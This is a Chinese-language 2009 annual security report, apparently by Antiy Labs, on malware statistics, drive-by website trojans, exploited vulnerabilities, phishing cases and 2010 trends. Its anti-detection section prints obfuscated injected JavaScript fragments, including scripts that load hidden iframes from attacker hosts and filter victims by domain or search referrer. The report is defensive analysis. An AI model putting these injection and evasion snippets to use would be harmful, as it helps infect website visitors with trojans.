2009年中国大陆地区网络安全报告

network

1、2009年计算机病毒疫情统计与分析 ·2005-2009年新增病毒数量对比

    2009年恶意代码总体增长数量大约是08年的2倍，平均日处理量约47765个，增长趋势和往年相比，没有显现大起大落之势，总体相对平稳。从今年的转变可以看出，恶意代码地下经济体系已经成熟，内部操作更加规范化、商业化、立体化。恶意代码的技术性与目的性更强，不再以量多取胜，而是更关注恶意代码生存周期的长短、传播能力的高低、窃取的敏感信息具有商业价值的大小等。

·2008与2009年新截获各类病毒对比     各类恶意代码在08年的数量基础上均有所增长，例如：木马08年为6,536,214个，09年为12，129，114个；蠕虫08年为917,321个，09年为1,317,161个。其中较08年相对增长最多的仍为木马，在恶意代码中木马是盗取信息的核心程序。蠕虫与传统感染式病毒在恶意代码中主要作用为传播自身并下载大量盗取信息的木马程序和各种杀软反制程序等。

·2009年新截获各类病毒比例     2009年木马占比达77%，总数量已达千万，仍稳居恶意代码主流地位。蠕虫与病毒相对08年占比均有所回落；蠕虫08年占比11%，今年占比8%；病毒08年占比5%,今年占比4%。以恶意代码呈几何级数的增长速度来预计：2010年以后木马的数量级达到上亿，那么蠕虫与病毒等类别恶意代码，在木马的庞大基数下，将直接被淹没。

·2009年每月新增病毒统计     从每月新增病毒统计图来看，3到5月恶意代码活跃性较低，6月则是上升的拐点，6月后总体呈迅速上升趋势。从此趋势来预测，马上要到来的新年期间将是恶意代码持续增长并疯狂传播的时期。

·2009年每月新增家族数量统计     新恶意代码家族不断加入，直接拉动了恶意代码的持续快速增长。2009年总体增加恶意代码家族量为12674个，约是2008年的1.42倍；其中仅仅10月份一个月便有1743个恶意代码家族产生；如此快速的增加，直接反映出恶意代码已经走出了以前的小手工作坊式开发，目前主流是以团队协作、分工明确、各司其职的产业化形式运作。

·2009年每月各类病毒数目统计     每月各类病毒数目统计中以木马曲线最为突出，从图中可以看出，在下半年木马增加异常迅猛；同样蠕虫在09年下半年也明显增长。其它类恶意代码在每月病毒数目中增长较为平缓，没有明显增长的趋势。

·2009年度Top10恶意代码排名

排名	病毒名称
1	Trojan/Win32.OnLineGames[Stealer]
2	Trojan/Win32.QQPass
3	Backdoor/Win32.PcClient
4	Trojan/HTML.Agent
5	Trojan/Win32.Small[Downloader]
6	Worm/Win32.Otwycal
7	Virus/Win32.Virut
8	Virus/Win32.sality
9	Trojan/VBS.Agent
10	Trojan/Win32.KillAV

下面对十大病毒的病毒特点、传播方式进行简要介绍：
1.Trojan/Win32.OnLineGames[Stealer]
病毒特点：专门盗取网络游戏玩家的游戏账号与密码等信息；通过WEB、邮件方式回传信息。
传播方式：通过网站挂马、下载器下载、文件捆绑方式传播。
2.Trojan/Win32.QQPass
病毒特点：专门盗取即时聊天工具账号与密码等信息；通过WEB、邮件方式回传信息。
传播方式：通过网站挂马、下载器下载、文件捆绑方式传播。
3.Backdoor/Win32.PcClient
病毒特点：通过后台连接控制端并接受其控制的后门程序。
传播方式：通过网站挂马、下载器下载、文件捆绑方式传播。
4.Trojan/HTML.Agent
病毒特点：通过后台连接网络访问指定的URL，部分变种也具有盗取游戏账号的功能。
传播方式：通过网站挂马、下载器下载、文件捆绑方式传播。
5.Trojan/Win32.Small[Downloader]
病毒特点：通过后台连接网络并在指定URL下载其它病毒文件。
传播方式：通过网站挂马、即时聊天工具、电子邮件附件方式传播。
6.Worm/Win32.Otwycal
病毒特点：释放驱动、反制反病毒软件，下载其他病毒，部分变种具有感染EXE文件和网页文件的功能。
传播方式：通过网站挂马、下载器下载、可移动存储介质传播。
7.Virus/Win32.Virut
病毒特点：PE文件感染、感染代码具有多种形态，部分变种具有下载、反制杀软、连接远程IRC服务器接受控制等。
传播方式：通过PE文件感染、可移动存储介质传播。
8.Virus/Win32.sality
病毒特点：sality是一个经典的感染式病毒，并且使用U盘进行传播，在其配置文件autorun.inf中加入注释随机字符，以避免反病毒软件的检测。
传播方式：通过PE文件感染、可移动存储介质传播。
9.Trojan/VBS.Agent
病毒特点：采用VBS脚本语言编写，并经过加密处理，反制杀毒软件，下载其他病毒。
传播方式：通过网站挂马、下载器下载、文件捆绑方式传播。
10.Trojan/Win32.KillAV
病毒特点：对绝大多数杀毒软件进行反制，下载其他病毒。
传播方式：通过网站挂马、可移动存储介质传播。
2、2009年黑客地下经济体系产业链分析 网站挂马分析·2009年每月恶意网站拦截统计     2009年共拦截恶意网站6,550,000个，以8月拦截最多830,000个。因为被挂马的网站访问量的大小会直接导致中木马机率的高低，所以现在挂流量大的网站已成为新的趋势。在统计中出现两个月(5月与8月)的恶意网站高峰期后，渐渐表现出回落趋势。

·2009年网站挂马利用漏洞对比图     图中给出了网站挂马经常利用的微软漏洞和第三方软件漏洞情况，其中包括比较新的MS09-043等。在占比中Adobe Flash占12%位居利用的首位，MS09-002占10%，除此之外暴风影音等软件漏洞也占相当大的比例，建议用户经常升级常用第三方软件到最新版本。

·2009年Top10挂马利用域名     下表为2009年网站挂马利用域名系统的Top10，其中以e6t.3322.org为首，其次是vvk2.cn；从大量的域名中统计得出，被挂马利用的域名位置多是中国南方部分城市。

·2009年最具有影响力的十大挂马网站     下面是2009年最具有影响力的十大挂马网站；知名网站的流量大，正是挂马者最看重的原因；一旦对知名网站挂马成功，那么木马的传播量与传播速度则会相当惊人。

·2009年恶意URL网站分类比例     各种不同类别的网站其被挂马占比也是不同的，在2009年被挂马网站分类对比图中列出了各个被挂马网站占比。其中以娱乐网站占比最多为23%，教育网站占比16%排在第二位。这两类网站拥有庞大的用户群体，正符合了目前挂流量大的网站来进行迅速传播木马这个新的趋势。

·2009年网马利用的漏洞分析 (1).利用MEPEG-2（MS09-032）漏洞
    Microsoft DirectX是Windows操作系统中的一项功能，流媒体在玩游戏或观看视频时通过这个功能支持图形和声音。DirectSho（msvidctl.dll）的BDATuningModelMPEG2TuneRequest视频组件中存在栈溢出漏洞。此漏洞可以通过IE浏览器远程利用，如果用户受骗访问了恶意网页并打开读取MPEG-2文件的话，就可能触发这个溢出，导致执行任意指令。通过构造恶意页面达到挂马的目的，已经成为本年流行的挂马方式。Microsoft DirectShow微软视频0DAY漏洞网马部分代码：

(2).利用office漏洞
    微软的office办公工具本年曾多次出现0DAY漏洞，成功利用者可以远程获得主机权限，如果拥有微软office漏洞的用户浏览针对此漏洞进行网站挂马的页面时，将会自动下载木马并在后台执行。下图为部分利用代码举例：

(3).利用浏览器漏洞
    利用浏览器漏洞进行挂马一直是成功率最高的。无论用户使用何种浏览器，一旦所使用的浏览器含有漏洞，当访问针对此漏洞进行恶意构造的WEB时，就会自动下载木马并运行。本年利用浏览器进行挂马已经进入一个新的高峰期。这与微软IE、火狐等浏览器频繁出现ODAY漏洞是分不开的。下图为IE网马部分代码举例：

(4).利用Adobe Flash Player漏洞
    之所以Adobe Flash Player漏洞成为挂马的流行方式，是因为具有一定安全意识的用户可能会注意到微软Windows的系统补丁非常重要并及时升级，但其对第三方软件的漏洞可能仍不够重视；所以利用Adobe Flash Player漏洞进行网站挂马的中马率很高，从而导致利用Flash漏洞进行挂马成为主要的挂马方式之一。下图为部分利用代码举例：

(5).利用在线播放器漏洞挂马
    由于网络的迅速发展带宽已经由128K/s增长到了2M/s以上，使得网络影视得以迅速发展，最为明显的为网络在线播放器，例如：PPLIVE、快播等，随着在线播放器的用户量不断增加，相应的播放器漏洞也被发现，因此出现利用在线播放器漏洞进行网站挂马的事件增加。下图为部分利用代码举例：

注：更系统性的网站挂马分析请见“2009年中国大陆地区网络安全报告”
报告链接地址： http://www.antiy.com/cn/security/2009/security-report.htm
·2009年重大网络安全事件 暴风门事件

    2009年5月19日，暴风影音域名服务器所在机房被黑客攻击，使其客户端升级程序无法正常访问域名服务器，从而间接导致全国多省网络不能正常访问。因该事件引起一些关联的猜测和假想，亦有媒体根据暴风影音的客户端升级程序的某些表现猜测stormliv.exe是一个后门程序。鉴于此安天对暴风影音程序进行深入分析后，确定为正常程序，是黑客对三个游戏私服广告网站的域名解析服务器实施攻击，因受攻击的域名解析服务器同时为“暴风影音”软件提供域名解析服务，造成“暴风影音”软件域名解析请求拥塞，进而导致多个省份网络域名解析服务瘫痪，导致大范围的网络故障。
注：更多内容请详见“暴风影音客户端升级程序分析报告”
报告链接地址：http://www.antiy.com/cn/security/2009/stormliv200905.htm

微软Office漏洞事件

    09年微软短时间内多次发布紧急漏洞公告，并且出现多个0Day漏洞，影响范围广的如MS09-043，导致1000多万用户遭到“挂马”攻击，而且漏洞弥补周期长达一星期之久，迫使大量用户选择卸载、使用临时解决工具等方法暂时避过风头。

Adobe漏洞事件

    Adobe自发布以来曾多次公布漏洞，虽然每次漏洞出现都会及时弥补，但是也同样给用户带来了一定的损失，在09年但凡含有Adobe Flash Player和Adobe Acrobat Reader漏洞的用户使用浏览器访问特定构造的页面都会中马，可以说几乎横扫了所有的浏览器。

飞信“非常6+1中奖短信”钓鱼事件

    一些假冒央视“非常6+1”栏目官网的钓鱼网站正通过飞信大肆传播并行骗。不法分子首先盗用他人飞信账号，然后向其好友发送诈骗信息，谎称用户获得高额奖金或奖品，从而诱骗用户访问钓鱼网站，并通过要求用户输入验证码、提供咨询电话、提供公证书查询等手段使得骗局更具迷惑性。

3. 2010年度信息安全威胁\趋势预测

1、黑客地下经济体系产业链将更加隐蔽，各自分工与协作将更加团队化、企业化。
2、网站挂马事件将会不断增加，特别是流量大的网站被挂马次数会明显增多。
3、大型跨国网络DDOS攻击将会持续，有进一步增长的可能。
4、智能手机病毒将会是恶意代码另一个重要分支，手机病毒疫情2010年可能会较为严重。
5、网络钓鱼事件将会快速增长，其目的也不是单纯的骗取网银，目的性会日趋复杂，扩张到多个新的行业，谋取间接的利益。
6、ARP欺骗将会在局域网内再次泛滥，特别中小企业较为严重。

4. 2010年度反病毒技术发展趋势分析

1、反病毒软件继续完善虚拟化、云计算等技术。
2、手机杀毒软件将会进一步完善，特别是智能手机操作系统杀毒软件将增多。
3、反病毒软件处理互联网问题的综合能力将持续增强，其针对性会更加明确与细化。

network

2009年中国大陆地区网络安全报告

( PDF报告下载 ) {PDF文档阅读软件下载}

一、2009年挂马数据统计1、挂马网站统计    2009年共拦截恶意网站6,550,000个，以8月拦截最多830,000个。因为挂马网站访问量的大小会直接导致中木马机率的高低，所以现在挂流量大的网站已成为新的趋势。在统计中出现5月与8月两个高峰期后，渐渐表现出回落趋势。 2、恶意网站的地域分布    2009年，中国大陆地区挂马网站的地域分布，经统计绝大部分来自于广东省，占总比例的15%；其次是江苏、浙江等地，也占了不少份额；北京，由于特殊的地位，紧随其后，占了总比例的9%；其他省、直辖市共占了总比例的24%。 3、恶意网站域名统计    2009年对恶意网站域名统计来看，顶级域名以“.cn”为主，其次是“.org”、“.com”。从恶意域名Top10表中可以看出，70%的恶意网站都分布在我国的广东地区。此外，在美国地区的恶意域名“3b3.org”、“3bomb.com”，也占有很大的比例。     恶意域名有着时效性，挂马者会经常更换恶意域名，为了防止安全厂商将其收录为黑名单后，减少网马的传播范围，或是有关机关将其封杀，阻断它的传播。     经长期对恶意链接的跟踪分析发现，一些恶意链接的域名极其相似，其中只有一个字符（数字、字母）在变化，很显然是同一个挂马团伙所为。下表列出一些典型的相似域名，其中，“*”代表一个字符（数字0-9）。 4、挂马利用漏洞总结    纵观2009年挂马漏洞利用方面，Adobe Flash由于它的重要性，一直贯穿始终；MS06-014作为老网马典型的一员，也从未被遗弃。以7月份出现的MS09-032网马出现为分界线，7月份之前，挂马漏洞利用方面，主要以MS06-014、MS08-041、MS09-002、暴风影音、联众世界、RealPlayer漏洞为主；7月份之后，主要以MS06-014、MS09-002、MS09-032、MS09-043、Flash漏洞、PDF漏洞为主；其它一些新老漏洞时而会出现在集成网马中。 5、利用网马传播的木马     木马传播的途径有很多，可以利用U盘，电子邮件、通讯软件等途径进行传播，然而利用最多而且最有效的就是利用挂马网站进行传播；经统计，2009年通过挂马网站传播的木马以网游盗号类木马居多，其次是木马下载器、后门等病毒程序，可见挂马者目的性很强，纯粹为了金钱利益。 6、挂马网站分类    挂马在不同类的网站占比也是不同的，在2009年被挂马网站分类对比图中列出了各个不同类的网站占比。其中以娱乐网站占比最多为23%，教育网站占比16%排在第二位。这两类网站人们关注范围大，点击次数多，直接促使网马的占比提升。 7、2009年大站挂马    下面是2009年最具有影响力的挂马网站，知名网站的流量大，正是挂马者最看重的原因。一旦对知名网站挂马成功，那么木马的传播量与传播速度则会相当惊人。在下述列表的大站中，还有在一年内多次出现挂马情况的，这里并未一一列出。 8、2009年高校挂马     这仅仅是众多被入侵网站中造成影响较大的几个例子，而自从国内有互联网之初，各种入侵高校网站的黑客就层出不穷，根据国内著名安全机构安天实验室的一份高校黑客入侵统计显示，国内121个重点大学和487个普通大学中，86%的高校网站曾因为存在漏洞而遭到黑客入侵，他们并不会因为自己是名牌大学，甚至是计算机网络相关专业而幸免于外。 二、2009年出现的网马及事件追踪1、MS09-002漏洞    2009年2月10日，微软官方在安全公告发布MS09-002，Internet Explorer 7含有远程溢出漏洞，随后利用MS09-002漏洞的网马大规模爆发，被广泛应用于挂马中。 典型案例：2009年4月15日，中国科学院计算机网络信息中心(http://www.cnic.ac.cn/query/thesis/Details.asp?txtRecordNO=11)，被黑客植入恶意代码，黑客利用的网马中便包含MS09-002漏洞 2、暴风影音2009(mps.dll)ActiveX远程栈溢出漏洞    2009年4月30日，暴风影音被爆有远程溢出漏洞，受影响版本有暴风影音2.7/2.8/2.9，在5月份大规模爆发，被广泛应用于挂马中。     典型案例：2009年5月15日，上海热线(http://isp.online.sh.cn/)，被黑客植入恶意代码，黑客利用的网马中便包含暴风影音漏洞。 3、中国游戏中心游戏大厅 (CGAgent.dll)ActiveX远程栈溢出漏洞    2009年4月30日，中国游戏中心游戏大厅爆有远程溢出漏洞，受影响版本有中国游戏中心游戏大厅2009，随后被黑客应用于挂马中，不过只是昙花一现，很少被黑客应用到挂马中。     典型案例：2009年6月22日，新浪网宠物频道(http://pet.sina.com.cn)，被黑客植入恶意代码，黑客利用的网马中便包含中国游戏中心游戏大厅漏洞。 4、MS09-032漏洞    2009年7月14日，微软官方在安全公告发布MS09-032，Microsoft DirectShow被爆有远程溢出漏洞，被黑客广泛应用于挂马中。     典型案例：2009年7月30日，39健康网(http://sex.39.net/xxl/fqxxl/084/2/278466.html)页面，被黑客植入恶意代码，黑客利用的网马中便包含MS09-032漏洞。 5、MS09-043漏洞    2009年8月11日，微软官方在安全公告发布MS09-043，Microsoft Office Spreadsheet ActiveX控件含有远程溢出漏洞，此漏洞在7月份已经被广泛应用挂马中。     典型案例：2009年8月12日，搜狐留学频道(http://liuxue.sohu.com/sgp/)，被黑客植入恶意代码，黑客利用的网马中便包含MS09-043漏洞。 三、网马反检测手段    杀毒软件在与网马不断较量中逐渐成熟，挂马者也从未停歇前进的步伐，他们不断挖掘新的漏洞，使用新的反检测手段，以逃避杀软的查杀。网马反检测除了普遍的加密、变形、混淆技术采用了挂马者认为更有效的手段来实践于挂马。本节从以下3个方面介绍下目前网马流行的反检测手段。 1、多脚本拼接    挂马者为了防止杀软对网马检测，通常会使用多层跳转链接，最后跳转真正的网马页面；还会通过对单个网马恶意代码用多个脚本拼接来达到反查杀目的。 案例举析：     2009年10月21日，安天实验室发现，天涯社区-天涯美食（http://food.tianya.cn/diy/view_info.jsp? idWriter=0&key=0&changeProvincePid=22&changeCityPid=64&articlePid=17508&channelPid=1）页面，被黑客植入恶意代码。 利用MS06-014漏洞传播的网马主页面部分代码： <SCRIPT LANGUAGE="JavaScript"> <!-- Hide function killErrors() { return true; } window.onerror = killErrors; // --> </SCRIPT> <script src=14.js></script> <script src=15.js></script> <script src=17.js></script> <script src=16.js></script> <script src=18.js></script> <script language="JavaScript"> …… 其中嵌入5个JS脚本页面，链接如下： 14.js 15.js 16.js 17.js 18.js 14.js页面代码： YTJJH='http://d.iopqw.com/xx/x16.css';     注：利用MS06-014漏洞传播的木马链接 15.js页面部分代码： var yyyyy="\x53"; var JJJHHHHHFaaaa="o"; var JJJHHHHHFaaa="d"; var JJJHHHHHFaa="\x41"; var YTavp32=JJJHHHHHFaa+JJJHHHHHFaaa+JJJHHHHHFaaaa; …… 16.js页面部分代码： var ssssllk="s"; var AASSYTA1=ssssllk+"o"+"f"; var PPDDD="M"; var AASSYTA=PPDDD+DDDDPP; var XXXPP="t."; …… 17.js页面部分代码： var YuTs="Ap"+"pl"+"ic"+"ati"+"o"+"n"; var YuTx=YuT+YuTs; var nod3232="c"+"L"; var BBBCCCY="W"+"ri"+"te"; var SSSSKKKWU="c"+"re"+"at"+"eE"+"le"+"me"+"nt"; …… 18.js页面代码： var YTJJHee=nod3232+"s"+"id:"; var YTJJHees="0-"+"9"+"8"+"3"+"A"+"-"+"0"; var YTJJHeess="0"+"C"+"0"+"4"; var YTJJHeesss="F"+"C"+"2"+"9"+"E"+"3"+"6"; var YTJJHeex="BD"+"96C"; var YTJJHeexx="556"+"-65A3"+"-11D"; var YTJJHeex=YTJJHee+YTJJHeex+YTJJHeexx+YTJJHees+YTJJHeess+YTJJHeesss; 注：还原后对应MS06-014漏洞的CLSID值：BD96C556-65A3-11D0-983A-00C04FC29E36 2、判断域名挂马    2009年5月份，常会发现一些含有“.edu.cn”、“.gov.cn”域名的网站，内部被嵌入恶意代码，却不中马的情况，在分析其中代码后，才窥得其中究竟，原来是挂马者为了规避政府、教育类网站，在域名上动了手脚。 案例举析：     2009年5月22日发现宽甸满族自治县石湖沟乡人民政府网站（http://www.lnkd.gov.cn/shg/zsview.asp?NewsID=252&;classID=7），被黑客注入恶意链接（http://3b3.org/c.js）。 http://3b3.org/c.js的代码分析： var s,siteUrl,tmpdomain;                        //定义变量 var arydomain = new Array(".gov.cn",".edu.cn"); //定义数组变量，并把.gov.cn、.edu.cn赋值给数组变量 s = document.location+"";                       //返回调用http://3b3.org/c.js页面的url siteUrl=s.substring(7,s.indexOf('/',7));        //获取字符串“www.lnkd.gov.cn” tmpdomain = 0;                                  //设置开关变量tmpdomain，并赋初值为0 for(var i=0;i<arydomain.length; i++)           //遍历数组成员 { if(siteUrl.indexOf(arydomain) > -1){        //判断数组成员“.gov.cn”、“.edu.cn”是否在“www.lnkd.gov.cn”中                                             tmpdomain = 1;                                 //如果在，那么将tmpdomain值赋为1 break;                                        //退出循环体 } } if(tmpdomain == 0){         //如果tmpdomain = 0，也就是说在“www.lnkd.gov.cn”中没有找到“.gov.cn”、“.edu.cn” document.writeln("<iframe src=http://4y553r7.8866.org/a/a100.htm width=0 height=0></iframe>"); //那么将写入并以不显示窗口的前提下打开恶意网站链接（http://4y553r7.8866.org/a/a100.htm）。     从上面代码我们可以知道挂马集团对于政府和教育网站采取了屏蔽措施，政府和教育网站对于挂马集团的意义不大，由于网站有访问用户的原因，在国内挂马的目的主要还是为了盗取游戏账号、网上交易账号等，所以常常挂马集团选择商业网站、游戏网站和大流量网站等。我们在这点也可以看出挂马集团为了保障其整体黑色产业链中挂马效率的问题，放弃了一些价值比较低的网站，而且这也可以有效的提高其网马及其网马链接的存活周期。 3、搜索引擎成为网马“传播途径”    2009年7月份，会发现一些被挂马网站页面含有恶意代码，直接访问，却不中马的情况，只有此网站的链接被某些特定的搜索引擎收录，而且通过这些搜索引擎搜索出该链接，点击链接进入该网站时才会中马。经过分析，发现黑客是为了增加挂马的隐蔽性，采取的曲线挂马方式，用来躲避反病毒厂商的蜜罐检测。     2009年7月30日上午8时，安天实验室发现，39健康网(http://sex.39.net/xxl/fqxxl/084/2/278466.html)，被黑客植入恶意代码，追踪线索，发现39健康网其中的“http://images.39.net/js/art_tips.js”中包含“http://disk.e165.com/new.js”页面，便利用搜索引擎“传播网马”的情况出现。 http://disk.e165.com/new.js代码分析： var url=document.referrer;    var p=url.toLowerCase().indexOf("www.baidu.com","search.cn.yahoo.com","www.soso.com","search.114.vnet.cn", "zhidao.baidu.com","seek.3721.com","www.sogou.com","www.google.cn");    if (p>0) { document.writeln("<iframe src=http:\/\/killcctv.9966.org\/3\/4.htm?03 width=111 height=0 border=0><\/iframe>"); 代码解析：只有“http://images.39.net/js/art_tips.js”链接被“www.baidu.com”、“search.cn.yahoo.com”、www.soso.com”、“search.114.vnet.cn”、“zhidao.baidu.com”、“seek.3721.com”、“www.sougou.com”、“www.google.cn”等搜索引擎任意一家收录，并通过这些搜索引擎搜索出该链接，点击链接进入该网站时才会中马。 四、钓鱼网站    钓鱼网站，有着与正常网站极其相似的域名，模拟正常网站的界面，以迷惑用户，通过手机、通讯软件、电子邮件等方式，用来散播虚假的中奖信息，通过用户提交的敏感信息、银行汇款等途径，来谋取非法利益。     网络钓鱼作为网络上一些不法者谋求利益的手段，已经深入社会上各个领域。由于钓鱼网站的危害性，早在2008年，就由国内银行证券机构、电子商务网站、域名注册管理机构、域名注册服务机构、专家学者等组成了“中国反钓鱼网站联盟”；各家安全厂商针对钓鱼网站，纷纷更新自己的产品，通过技术手段把检测钓鱼网站添加到自己的产品中，已经有效的遏制住一部分钓鱼网站的蔓延。在2009年，安天实验室截获的钓鱼网站数量，要远远高于去年，可见网络钓鱼带给黑色产业链多少利益。 1、飞信“非常6+1中奖短信”钓鱼事件    2009年10月，安天实验室接到用户举报，飞信常收到这样的中奖信息，内容是：“尊敬的飞信用户：您好!恭喜您在CCTV[非常6+1]活动中被后台系统抽中，请速登录活动官网（www.cctv2fetion.com）查您的巨额奖，凭验证密码【9188】填写详细资料领取。” 打开（http://www.cctv2fetion.com），出现如下画面。 不法分子首先盗用他人飞信账号，然后向其好友发送诈骗信息，谎称用户获得高额奖金或奖品，从而诱骗用户访问钓鱼网站，并通过要求用户输入验证码、提供咨询电话、提供公证书查询等手段使得骗局更具迷惑性。 2、skype钓鱼事件    2009年12月3日，安天实验室根据用户举报，某些skype用户收到如下中奖消息：     用户如果访问该网站，按照网站提示填写信息，会导致用户丢失敏感信息。以至于受到经济损失。 Skype仿冒页面：     用户填入由skype用户名以及收到的验证码登陆后，就会掉入奖品诱惑的圈套当中。此仿冒网站制作相当逼真，域名也比较相近，使用户降低警惕性。 五、2010年恶意网站趋势预测     “挂马”与“钓鱼”为黑色产业链带来巨大的利润，面对这两大网络公敌，虽然不乏有好的安全产品出现，但仍旧不能有效阻止它们的传播。预计在2010年，挂马与钓鱼方面只增不减。     网马在与杀毒软件不断抗争中，挂马团伙依旧会不断挖掘新的漏洞，利用新的防检测手段逃避杀软的查杀；还会继续跟踪热点事件，选择流量大的网站进行挂马，以促使网马广泛的传播。     钓鱼方面，黑客更加隐蔽、逼真的传播钓鱼网站，通过即时通讯软件、电子邮件、手机短信等方式，揣摩用户的心理，利用社会工程学，对用户进行欺骗。     2010年2月份，一年一度的春节又将来临，届时，春节的到来让旅游、购物、票务网站等的访问量大幅上升，也给挂马者提供了一个很好的机会。谨提醒广大用户，增加网络安全防范意识，安装防线2009，以规避安全风险。